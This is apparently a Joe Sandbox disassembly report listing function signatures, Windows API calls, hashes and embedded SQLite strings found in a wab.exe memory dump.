                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastUnlock_memset
                                                        • String ID: %s-shm$cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 4009513553-3592428516
                                                        • Opcode ID: df0f943ebc82cc9dab066d13192f74e91ec3118cf66e1475f2c939737b3755b8
                                                        • Instruction ID: 7c33581aa87679874a66b74cbf1c48bd153cb9cfbd13daa227090b6752703d09
                                                        • Opcode Fuzzy Hash: df0f943ebc82cc9dab066d13192f74e91ec3118cf66e1475f2c939737b3755b8
                                                        • Instruction Fuzzy Hash: DBB18CB1A44302AFE350CF28D885BA77BF8BB44714F00493DE95DD6282EB74E516CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: localtime$month$start of $unixepoch$weekday $!C$RE
                                                        • API String ID: 0-3451703848
                                                        • Opcode ID: 84cd0bd75365f64ba82fc63433ba820a380a81d5fa8a4dbd5d561b7d46634b49
                                                        • Instruction ID: 914bb104832094f4ae65f0cc6ee668724a12fc77f6191d4dc2dbf16e065b9623
                                                        • Opcode Fuzzy Hash: 84cd0bd75365f64ba82fc63433ba820a380a81d5fa8a4dbd5d561b7d46634b49
                                                        • Instruction Fuzzy Hash: 25916672A002495FDF018F64D8A0BEE7BF2AF66714F4845ADDD4CAB34AE73194078790
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?,00000000,?,?), ref: 2147938B
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • GetVersionExW.KERNEL32(?,00000000,?,?), ref: 214793CC
                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 214793EC
                                                        • _malloc.LIBCMT ref: 214793F9
                                                        • _free.LIBCMT ref: 21479408
                                                        • GetFullPathNameW.KERNEL32(00000000,00000003,00000000,00000000), ref: 2147942B
                                                        • _free.LIBCMT ref: 21479432
                                                          • Part of subcall function 214D6401: HeapFree.KERNEL32(00000000,00000000,?,214D8196,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6417
                                                          • Part of subcall function 214D6401: GetLastError.KERNEL32(00000000,?,214D8196,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257,00000000), ref: 214D6429
                                                          • Part of subcall function 21477620: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,21479488), ref: 21477634
                                                          • Part of subcall function 21477620: _malloc.LIBCMT ref: 2147763D
                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 21479444
                                                        • _malloc.LIBCMT ref: 2147944E
                                                        • GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 21479461
                                                        • _free.LIBCMT ref: 21479468
                                                        • _free.LIBCMT ref: 21479494
                                                        • _free.LIBCMT ref: 214794C1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _free$FullNamePath_malloc$ByteCharMultiWide$Version$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 3556260241-0
                                                        • Opcode ID: b483df60918d906dedfefe0e0e1ab5ac3e9908e03ca0d8e7782eeef7635741fa
                                                        • Instruction ID: 4af22c6ae4be30306303f00053f62603638aa3f156f7533d0f21fbbfe997253d
                                                        • Opcode Fuzzy Hash: b483df60918d906dedfefe0e0e1ab5ac3e9908e03ca0d8e7782eeef7635741fa
                                                        • Instruction Fuzzy Hash: 3A41C7B2A001255FD7109FA4CC85FDE77B8EF69724F1000BCE90D97241EB34AA068BA5
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?,00000000,00000000,774D2EE0), ref: 21479068
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • GetVersionExW.KERNEL32(?,00000000,00000000,774D2EE0), ref: 214790BD
                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,774D2EE0), ref: 214790E1
                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 214790E4
                                                        • GetLastError.KERNEL32 ref: 214790F1
                                                        • Sleep.KERNEL32(00000064), ref: 21479116
                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,774D2EE0), ref: 21479125
                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 21479128
                                                        • GetLastError.KERNEL32 ref: 21479135
                                                        • Sleep.KERNEL32(00000064), ref: 2147915A
                                                        • _free.LIBCMT ref: 21479163
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesByteCharDeleteErrorLastMultiSleepVersionWide_free$_malloc
                                                        • String ID: N!
                                                        • API String ID: 876893172-1329317394
                                                        • Opcode ID: d4ec0eb3a398d43c2cdb8b4696f3e5c95fcd0ee61615cf3fc902dd12c757b6f0
                                                        • Instruction ID: 7db25ae918e07fd9641cb63f139f7865793d38fc7e9cb044e080ff534360ced5
                                                        • Opcode Fuzzy Hash: d4ec0eb3a398d43c2cdb8b4696f3e5c95fcd0ee61615cf3fc902dd12c757b6f0
                                                        • Instruction Fuzzy Hash: 17417F72A002188FCB10AF74E888ACD77B5EB49334F1005ADD91ED7281DB385A42CB51
                                                        APIs
                                                        • _memset.LIBCMT ref: 214A90FE
                                                          • Part of subcall function 214C1AA0: _memset.LIBCMT ref: 214C1B41
                                                          • Part of subcall function 214BD210: _memset.LIBCMT ref: 214BD274
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$table$tbl_name='%q'$view
                                                        • API String ID: 2102423945-2854042851
                                                        • Opcode ID: 878472ea54a375c6174f2eaf4ab901d9d4c0a994cf50beed90faf57cd6f2b90c
                                                        • Instruction ID: 23fe1d1988342334c26347ddd17ff4077f39e86713c8050e0e923071e3c04a62
                                                        • Opcode Fuzzy Hash: 878472ea54a375c6174f2eaf4ab901d9d4c0a994cf50beed90faf57cd6f2b90c
                                                        • Instruction Fuzzy Hash: FDB16BB0D002099FEB14CFA8C894BAEBBB5BF69314F11816DD90DAB746D731A945CF90
                                                        APIs
                                                        • _memset.LIBCMT ref: 2148BDBC
                                                          • Part of subcall function 2147D4E0: _memset.LIBCMT ref: 2147D514
                                                        Strings
                                                        • database corruption at line %d of [%.10s], xrefs: 2148BDD0
                                                        • invalid page number %d, xrefs: 2148BFD6
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 2148BDC6
                                                        • 2nd reference to page %d, xrefs: 2148BFF0
                                                        • failed to get page %d, xrefs: 2148C032
                                                        • freelist leaf count too big on page %d, xrefs: 2148BEB6
                                                        • %d of %d pages missing from overflow list starting at %d, xrefs: 2148C018
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: %d of %d pages missing from overflow list starting at %d$2nd reference to page %d$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$failed to get page %d$freelist leaf count too big on page %d$invalid page number %d
                                                        • API String ID: 2102423945-881679150
                                                        • Opcode ID: e50aaaa2b0b26a9863db20fa323127a01dd479c58eac0b4e3951272212aba33d
                                                        • Instruction ID: 9239612dd094d3bae7d69fc10675abafce7ac0440805d4bca432dc7f77b62f3e
                                                        • Opcode Fuzzy Hash: e50aaaa2b0b26a9863db20fa323127a01dd479c58eac0b4e3951272212aba33d
                                                        • Instruction Fuzzy Hash: F2B10071A042169FD720CF18CC90A6ABBE1EF96355F09455DFA5C4B382C335E952CBE1
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?,?,00000008), ref: 214789C7
                                                        • GetTempPathW.KERNEL32(000000E6,?,?,00000008), ref: 214789F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: PathTempVersion
                                                        • String ID: %s\etilqs_$etilqs_
                                                        • API String ID: 261301950-1420421710
                                                        • Opcode ID: 24c9f8f3a049310c240662be07230c0645af600e3bddd9f7b42d60cb2af6033d
                                                        • Instruction ID: 487f233525662ecdcca62da53ec974a13cb885c11b2855c46dd3696fb68e1b22
                                                        • Opcode Fuzzy Hash: 24c9f8f3a049310c240662be07230c0645af600e3bddd9f7b42d60cb2af6033d
                                                        • Instruction Fuzzy Hash: 94716C7190429A8FE712DB38C845BF97BB5BF1A300F4406FDE45D8B282DA758B56CB90
                                                        APIs
                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 21477CD4
                                                        • Sleep.KERNEL32(00000001), ref: 21477CE2
                                                        • GetLastError.KERNEL32 ref: 21477CF2
                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 21477D33
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                        • String ID:
                                                        • API String ID: 3015003838-0
                                                        • Opcode ID: a2ab7f12d5162dd69c5f7eaba5becbe340736765f8ff1ba99b9b613b1c5271d2
                                                        • Instruction ID: 6b30c2fbad47e34cadf88de203f8826e50722beef0f09b19ff5767860adcca7a
                                                        • Opcode Fuzzy Hash: a2ab7f12d5162dd69c5f7eaba5becbe340736765f8ff1ba99b9b613b1c5271d2
                                                        • Instruction Fuzzy Hash: 09413576A41214ABE7218F64C448FFA3F75EB85B12F61855AED0C9F342C675CA038BD0
                                                        APIs
                                                        Strings
                                                        • error during initialization: %s, xrefs: 214B73D5
                                                        • not authorized, xrefs: 214B72A1
                                                        • no entry point [%s] in shared library [%s], xrefs: 214B737B
                                                        • sqlite3_extension_init, xrefs: 214B72C2
                                                        • unable to open shared library [%s], xrefs: 214B730A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: error during initialization: %s$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$unable to open shared library [%s]
                                                        • API String ID: 2102423945-3409965631
                                                        • Opcode ID: 4e708c09ba66d90c852c691acf3c4d02995977b79af22c6b2e662827184e57ca
                                                        • Instruction ID: ac580b3be14c9d5e60acf4081d769abbcebdd08242317adcaaf1dd391513df0a
                                                        • Opcode Fuzzy Hash: 4e708c09ba66d90c852c691acf3c4d02995977b79af22c6b2e662827184e57ca
                                                        • Instruction Fuzzy Hash: 04513472A002025FE7109F65EC81FAB77E8EB95716F04452DFE4CC6340EB75E91587A2
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 214791FD
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • GetVersionExW.KERNEL32(?), ref: 21479252
                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 21479292
                                                        • _free.LIBCMT ref: 214792E8
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiVersionWide_free$AttributesFile_malloc
                                                        • String ID:
                                                        • API String ID: 2391428990-0
                                                        • Opcode ID: fb12fbbbbb1a22d99a757fad647a65ae53e5d7bedd5981bb8384033b3d64bb2d
                                                        • Instruction ID: a117247a3ebabd725c810a41dfd627e903798669f17d86bafc06458c36044259
                                                        • Opcode Fuzzy Hash: fb12fbbbbb1a22d99a757fad647a65ae53e5d7bedd5981bb8384033b3d64bb2d
                                                        • Instruction Fuzzy Hash: DD414D72E002198FCB10EF68D9846DEBBF5EB4D325F1045AED81DE7281EB349A468F54
                                                        APIs
                                                        • UnmapViewOfFile.KERNEL32(214EEAE8), ref: 2147801B
                                                        • CloseHandle.KERNEL32(00000000), ref: 21478028
                                                        • CloseHandle.KERNEL32(?), ref: 2147803C
                                                        • Sleep.KERNEL32(00000064), ref: 2147804A
                                                        • CloseHandle.KERNEL32(?), ref: 21478054
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$FileSleepUnmapView
                                                        • String ID: N!
                                                        • API String ID: 888976869-1329317394
                                                        • Opcode ID: ad1610f6ef25b471d630b977d10fb909ad309f727748368845c1df4d8da2b254
                                                        • Instruction ID: fa25a8bc9f6b5056d822921b71ae12d443f60e50667d2ebac66831e46d143ede
                                                        • Opcode Fuzzy Hash: ad1610f6ef25b471d630b977d10fb909ad309f727748368845c1df4d8da2b254
                                                        • Instruction Fuzzy Hash: B2219CB5A01702DBD722CF64C980AAA77F8FF86750B024A2CE94957741CB34F942CBA0
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,214E94E0,00000008,214D8180,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C), ref: 214D8089
                                                        • __lock.LIBCMT ref: 214D80BD
                                                          • Part of subcall function 214D923C: __mtinitlocknum.LIBCMT ref: 214D9252
                                                          • Part of subcall function 214D923C: __amsg_exit.LIBCMT ref: 214D925E
                                                          • Part of subcall function 214D923C: EnterCriticalSection.KERNEL32(00000000,00000000,?,214D8250,0000000D,214E9508,00000008,214D8347,00000000,?,214D695C,00000000,214E9420,00000008,214D69C1,?), ref: 214D9266
                                                        • InterlockedIncrement.KERNEL32(?), ref: 214D80CA
                                                        • __lock.LIBCMT ref: 214D80DE
                                                        • ___addlocaleref.LIBCMT ref: 214D80FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                        • String ID: KERNEL32.DLL
                                                        • API String ID: 637971194-2576044830
                                                        • Opcode ID: 6bcefc099967d45fb70963242a39e7484bded9e14618e047708c5f67f11b3ff7
                                                        • Instruction ID: 9cf26d89d352375a1e510a3978cf919809f74e1659ded7bee64982726eeb7476
                                                        • Opcode Fuzzy Hash: 6bcefc099967d45fb70963242a39e7484bded9e14618e047708c5f67f11b3ff7
                                                        • Instruction Fuzzy Hash: A1015B72545702DEDB219F75C45871AFBE0AF30B21F10891ED8AE973A0CBB4A644CB15
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID:
                                                        • API String ID: 2102423945-0
                                                        • Opcode ID: 8612dc50b5a5b7b993dfd2376b35a8339da519b74cf930a804ae156454286adb
                                                        • Instruction ID: ab35f31782f8739d4e1f1d08f1f95d0ece5741a2eded67044dff31998b7304fd
                                                        • Opcode Fuzzy Hash: 8612dc50b5a5b7b993dfd2376b35a8339da519b74cf930a804ae156454286adb
                                                        • Instruction Fuzzy Hash: 2C029E70D00606DFDB11CF68D480B9ABBF5BF59B14F1486ADD8599B382E730EA51CBA0
                                                        APIs
                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 214785AB
                                                        • GetLastError.KERNEL32 ref: 214785D6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastUnlock
                                                        • String ID:
                                                        • API String ID: 3655728120-0
                                                        • Opcode ID: 7636b3ae472ba81ac6f050a276c258e4d1a49b897a4d7cc7e53f86b88de0a847
                                                        • Instruction ID: 453ab485317de09c888aaba44d757c934f84d72375e2d998e8c4234250012fe1
                                                        • Opcode Fuzzy Hash: 7636b3ae472ba81ac6f050a276c258e4d1a49b897a4d7cc7e53f86b88de0a847
                                                        • Instruction Fuzzy Hash: F271F971A00206AFDB40CF69C844AEABBF9FF98354F158469E91DDB301E774DA42CB90
                                                        APIs
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 214787EB
                                                        • GetLastError.KERNEL32 ref: 214787F8
                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 214788B4
                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 214788DC
                                                        • GetLastError.KERNEL32 ref: 21478906
                                                        • CloseHandle.KERNEL32(00000000), ref: 2147891C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: File$ErrorLast$CloseCreateHandleMappingSizeView
                                                        • String ID:
                                                        • API String ID: 1258392467-0
                                                        • Opcode ID: 256321b87266f904984627ef416601032a2997b81d073dd6bb297c0a837f2e09
                                                        • Instruction ID: 24e61487cd9a8db0653cc1930dafc874bd4db0d21018b1b72dd5d45583244e65
                                                        • Opcode Fuzzy Hash: 256321b87266f904984627ef416601032a2997b81d073dd6bb297c0a837f2e09
                                                        • Instruction Fuzzy Hash: D6514DB06007028FD764CF25D984AA6BBF9FF94314F00493DE99A87741EB70E915CB92
                                                        APIs
                                                        • __getptd.LIBCMT ref: 214DA446
                                                          • Part of subcall function 214D81A5: __getptd_noexit.LIBCMT ref: 214D81A8
                                                          • Part of subcall function 214D81A5: __amsg_exit.LIBCMT ref: 214D81B5
                                                        • __amsg_exit.LIBCMT ref: 214DA466
                                                        • __lock.LIBCMT ref: 214DA476
                                                        • InterlockedDecrement.KERNEL32(?), ref: 214DA493
                                                        • _free.LIBCMT ref: 214DA4A6
                                                        • InterlockedIncrement.KERNEL32(21751680), ref: 214DA4BE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 3470314060-0
                                                        • Opcode ID: eacc7f00dff943160583307a71b7cb46c70bd7db3f27efb6e7bfef7efe6c959c
                                                        • Instruction ID: dc421b6e3d76277f96db1459d29a3e3758d2d55a819905fd14e5e1c8d9c8cec6
                                                        • Opcode Fuzzy Hash: eacc7f00dff943160583307a71b7cb46c70bd7db3f27efb6e7bfef7efe6c959c
                                                        • Instruction Fuzzy Hash: DE01C4339416129FDF02AF64846875E7B60AF21B20F15412EE81CA7382CB38A641CFC1
                                                        Strings
                                                        • %r %s BY term out of range - should be between 1 and %d, xrefs: 2149D5AB
                                                        • too many terms in ORDER BY clause, xrefs: 2149D4D3
                                                        • ORDER, xrefs: 2149D5A4
                                                        • %r ORDER BY term does not match any column in the result set, xrefs: 2149D79A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$ORDER$too many terms in ORDER BY clause
                                                        • API String ID: 0-3892209816
                                                        • Opcode ID: 9f050286d33403f5ec971d1a901182967d08dae48a52068dc825cae7f3c016b8
                                                        • Instruction ID: ee4416329d22d653f079c9db51908e7b58ba07b0a32d25aad9fcef02d7a951c1
                                                        • Opcode Fuzzy Hash: 9f050286d33403f5ec971d1a901182967d08dae48a52068dc825cae7f3c016b8
                                                        • Instruction Fuzzy Hash: F7A19FB55042429FD701CF29C480A5ABBE4FF99364F148AADE99C9B341D332F946CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 0-1231421067
                                                        • Opcode ID: 9da2da234986bb5b36917235fa952a9ae09c8a08e7872655077dbb7d51edde50
                                                        • Instruction ID: 882cad875c3dbca3fe71ccb9e07a04d7a43da6968f79aa98092ada3684551d3a
                                                        • Opcode Fuzzy Hash: 9da2da234986bb5b36917235fa952a9ae09c8a08e7872655077dbb7d51edde50
                                                        • Instruction Fuzzy Hash: 4E818DB19053019FD300CF19C880A1ABBF5BF99728F158A6DF95C9B341D732E942CB92
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 214796E9
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • GetVersionExW.KERNEL32(?), ref: 2147973F
                                                        • LoadLibraryW.KERNEL32(00000000), ref: 21479759
                                                        • LoadLibraryA.KERNEL32(00000000), ref: 21479761
                                                        • _free.LIBCMT ref: 2147976A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLibraryLoadMultiVersionWide_free$_malloc
                                                        • String ID:
                                                        • API String ID: 878107876-0
                                                        • Opcode ID: 8ffe36e701ac0164fc58850fe22407c6a3e83eba968e7c2361aa324e4970d4c7
                                                        • Instruction ID: e470d4c27ba9c20ad48a33ffc421de936ef8c787ea98a0f9331e6cf0e9570979
                                                        • Opcode Fuzzy Hash: 8ffe36e701ac0164fc58850fe22407c6a3e83eba968e7c2361aa324e4970d4c7
                                                        • Instruction Fuzzy Hash: E021C032A001189FCB10DFB9D849ACEB7B8EB59724F1044ADD90DD7241DE349A068BA0
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 214778F8
                                                        • GetLastError.KERNEL32 ref: 21477909
                                                        • GetLastError.KERNEL32 ref: 2147790F
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 2147792C
                                                        • GetLastError.KERNEL32 ref: 21477952
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 3440492293-0
                                                        • Opcode ID: 6a63720a9b1c3a5ff0dfc621ec66d68eced2cfd2d541e027748720d8ade79d50
                                                        • Instruction ID: adb19b77846de4dcb589cbb6653273bac53fa8b4cffc9dd91af8038510c5223e
                                                        • Opcode Fuzzy Hash: 6a63720a9b1c3a5ff0dfc621ec66d68eced2cfd2d541e027748720d8ade79d50
                                                        • Instruction Fuzzy Hash: 9E11D6B26411196BEB10CEB8DC44FDB7BB8FB45661B400618FD2CDB381DA34E90187E0
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 214779AB
                                                        • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 214779DC
                                                        • GetLastError.KERNEL32 ref: 214779ED
                                                        • GetLastError.KERNEL32 ref: 214779F3
                                                        • SetEndOfFile.KERNEL32(?), ref: 21477A08
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLast$PointerUnothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1588551569-0
                                                        • Opcode ID: a94e6420b018df3692c9d92fc8ab7de6c6d3e9c6d46daf0cc62322bb422cc72a
                                                        • Instruction ID: b0c5a5b2075c1ab32cae1aaf5f00691100b3ce195bbf7c334b15fd4d7e5b49f7
                                                        • Opcode Fuzzy Hash: a94e6420b018df3692c9d92fc8ab7de6c6d3e9c6d46daf0cc62322bb422cc72a
                                                        • Instruction Fuzzy Hash: B91182B26002055BDB04CEA9DC84EAB7BADFB85621F444B59FD2CC7281DA34E90186B0
                                                        APIs
                                                        • _malloc.LIBCMT ref: 214D6765
                                                          • Part of subcall function 214D643B: __FF_MSGBANNER.LIBCMT ref: 214D6454
                                                          • Part of subcall function 214D643B: __NMSG_WRITE.LIBCMT ref: 214D645B
                                                          • Part of subcall function 214D643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,214D84E8,00000000,00000001,00000000,?,214D91C7,00000018,214E9530,0000000C,214D9257), ref: 214D6480
                                                        • _free.LIBCMT ref: 214D6778
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
